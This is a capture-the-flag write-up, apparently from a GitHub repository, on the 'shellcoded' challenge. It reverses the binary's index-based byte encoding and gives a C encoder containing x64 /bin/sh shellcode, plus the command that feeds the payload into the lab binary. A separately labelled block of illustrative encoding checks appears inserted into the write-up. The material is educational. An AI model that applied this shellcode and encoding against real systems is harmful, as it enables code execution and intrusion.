0xTen
shellcoded

shellcoded was mostly an easy reversing challenge rather than pwn, since you only had to reverse the encoding applied to the shellcode.


Last updated 3 years ago


Files

The binary

The binary does exactly what it says it does: it runs your shellcode. But there is obviously a catch.

Encoding

This code loops through the shellcode and, for each position, adds 1 * the index to the byte if the index is an even number, or -1 * the index if it is an odd number. To encode our shellcode properly, all we have to do is apply the same process, but subtracting instead of adding.

I wrote the following encoder for my shellcode:

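#include <stdio.h>

// x64 /bin/sh shellcode
unsigned char shellcode[] = "\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05";

int main(void){
    // Length is taken once from the array (minus the string terminator): the loop
    // rewrites the buffer, so strlen() would shrink if a byte encoded to 0x00.
    size_t len = sizeof(shellcode) - 1;
    size_t i;
    int v3;
    for (i = 0; i < len; i++){
        // Same sign rule as the binary's loop: -1 for odd indexes, 1 for even ones
        if ( (i & 1) != 0 ){
            v3 = -1;
        } else{
            v3 = 1;
        }
        // Opposite operation to the binary's +=
        shellcode[i] -= v3 * (int)i;
    }
    // Write the raw bytes; the encoded buffer is data, not a printf format string.
    fwrite(shellcode, 1, len, stdout);
    return 0;
}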

It's notable that I basically copied and pasted the original loop but replaced += with -= because I want to do the opposite operation.
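The transform described in the Encoding section and its inverse, as an added example that is not the challenge's code or the author's: `binary_transform` is reconstructed from the prose description, and all function names and sample bytes are constructed for illustration. It checks that encoding followed by the transform round-trips, and reports where an encoded byte becomes 0x00, the case that cuts short any `strlen`- or `printf`-based handling of the encoded buffer.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Reconstructed from the prose above (assumption, not the challenge's code):
 * even index i adds i to the byte, odd index subtracts i, modulo 256. */
static void binary_transform(uint8_t *buf, size_t len) {
    for (size_t i = 0; i < len; i++)
        buf[i] = (uint8_t)(buf[i] + ((i & 1) ? -(int)i : (int)i));
}

/* Inverse: apply the opposite offset so binary_transform() restores the input. */
static void encode(uint8_t *buf, size_t len) {
    for (size_t i = 0; i < len; i++)
        buf[i] = (uint8_t)(buf[i] - ((i & 1) ? -(int)i : (int)i));
}

/* 1 if encode() followed by binary_transform() gives back the original bytes. */
int roundtrip_ok(const uint8_t *data, size_t len) {
    uint8_t tmp[256];
    if (len > sizeof tmp) return 0;
    memcpy(tmp, data, len);
    encode(tmp, len);
    binary_transform(tmp, len);
    return memcmp(tmp, data, len) == 0;
}

/* Index of the first 0x00 in the encoded form, or -1 if there is none.
 * Any strlen()-bounded loop or printf() over the encoded buffer stops there. */
int first_nul_after_encode(const uint8_t *data, size_t len) {
    uint8_t tmp[256];
    if (len > sizeof tmp) return -1;
    memcpy(tmp, data, len);
    encode(tmp, len);
    for (size_t i = 0; i < len; i++)
        if (tmp[i] == 0) return (int)i;
    return -1;
}

/* Constructed, harmless sample bytes (not shellcode). */
static const uint8_t SAMPLE_PLAIN[] = {0x41, 0x41, 0x41, 0x41};
static const uint8_t SAMPLE_WRAP[]  = {0x01, 0xff};             /* 0xff + 1 wraps to 0x00 */
static const uint8_t SAMPLE_NUL[]   = {0x10, 0x20, 0x02, 0x40}; /* 0x02 - 2 becomes 0x00 */

int main(void) {
    printf("roundtrip=%d nul_plain=%d nul_wrap=%d nul_idx=%d\n",
           roundtrip_ok(SAMPLE_WRAP, sizeof SAMPLE_WRAP),
           first_nul_after_encode(SAMPLE_PLAIN, sizeof SAMPLE_PLAIN),
           first_nul_after_encode(SAMPLE_WRAP, sizeof SAMPLE_WRAP),
           first_nul_after_encode(SAMPLE_NUL, sizeof SAMPLE_NUL));
    return 0;
}
```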

Final Exploit

After generating my shellcode and saving it to a file I called payload.bin, I simply used the following command to send it over.

(cat ./payload.bin; cat) | ./shellcoded

CTFs/hacktivitycon/2021/shellcoded at main · 0xTen/CTFs (GitHub)